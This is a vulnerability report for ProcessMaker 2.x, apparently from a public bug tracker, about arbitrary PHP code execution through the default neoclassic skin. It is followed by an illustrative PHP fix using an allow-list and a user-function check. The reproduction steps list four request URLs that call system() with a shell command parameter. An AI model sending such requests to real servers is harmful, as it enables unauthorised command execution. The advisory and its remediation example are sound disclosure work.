Vulnerability details

ID: 0013436
Project: ProcessMaker (Community)
Category: XI ... Other
View Status: public
Date Submitted: 2013-10-24 08:24
Last Update: 2014-05-07 18:54
Reporter: lcoles
Assigned To: julicesar
Priority: high
Severity: major
Reproducibility: always
Status: resolved
Resolution: fixed
Platform / OS: (blank in the report)
Product Version: ProcessMaker v 2.0.45
Target Version / Fixed in Version: (blank in the report)

Summary
0013436: ProcessMaker 2.x Authenticated PHP Code Execution

Description
The "neoclassic" skin for ProcessMaker allows any authenticated user to execute arbitrary PHP code in the context of the web server user.

Steps To Reproduce
http://processmaker.example.com/sysworkflow/en/neoclassic/appFolder/appFolderAjax.php?action=system&params=dir
http://processmaker.example.com/sysworkflow/en/neoclassic/cases/cases/StarterPage_Ajax.php?action=system&params=dir
http://processmaker.example.com/sysworkflow/en/neoclassic/cases/caseNotesAjax.php?action=system&params=dir
http://processmaker.example.com/sysworkflow/en/neoclassic/cases/cases_SchedulerGetPlugins.php?action=system&params=dir

Additional Information
The vulnerable skin is installed by default in ProcessMaker version 2.x and cannot be removed via the web interface.

Solution
A new method was implemented to validate whether it is a user custom function or a system function (G::isUserFunction). Available in version 2.5.2.
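The fix described under Solution, as an added illustration that is not ProcessMaker's code: the dispatcher, its allow-list and the two application functions are constructed for this example, and PHP's ReflectionFunction::isUserDefined() plays the role the report gives to G::isUserFunction(), rejecting any request whose action names a PHP built-in.

```php
<?php
// Added illustration, not ProcessMaker code. The report's handlers dispatched
// on the request's "action" parameter with the "params" value as argument, so
// a built-in such as system() was reachable by name. Two checks close that:
// an explicit allow-list of actions, and a test that the name is a function
// defined by application code rather than a PHP internal.

final class AjaxDispatcher
{
    /** Constructed allow-list: only actions this handler is meant to serve. */
    private const ALLOWED_ACTIONS = ['listFolders', 'renameFolder'];

    /**
     * True only when $name is a user-defined function. function_exists()
     * alone is not enough, because it is also true for internals like system().
     */
    public static function isUserFunction(string $name): bool
    {
        if (!function_exists($name)) {
            return false;
        }
        return (new ReflectionFunction($name))->isUserDefined();
    }

    /**
     * Dispatch a request array (e.g. $_GET). Both values come from the client,
     * so the action is validated before it is ever used as a callable.
     */
    public static function dispatch(array $request): string
    {
        $action = (string) ($request['action'] ?? '');
        $params = (string) ($request['params'] ?? '');

        if (!in_array($action, self::ALLOWED_ACTIONS, true)
            || !self::isUserFunction($action)) {
            http_response_code(400);
            return 'invalid action';
        }
        return $action($params);
    }
}

// Constructed application functions the dispatcher is allowed to reach.
function listFolders(string $params): string { return "folders for: $params"; }
function renameFolder(string $params): string { return "renamed: $params"; }

// Demo: the built-in name from the report is refused, an allowed action runs.
var_dump(AjaxDispatcher::isUserFunction('system'));
var_dump(AjaxDispatcher::isUserFunction('listFolders'));
echo AjaxDispatcher::dispatch(['action' => 'system', 'params' => 'dir']), "\n";
echo AjaxDispatcher::dispatch(['action' => 'listFolders', 'params' => 'root']), "\n";
```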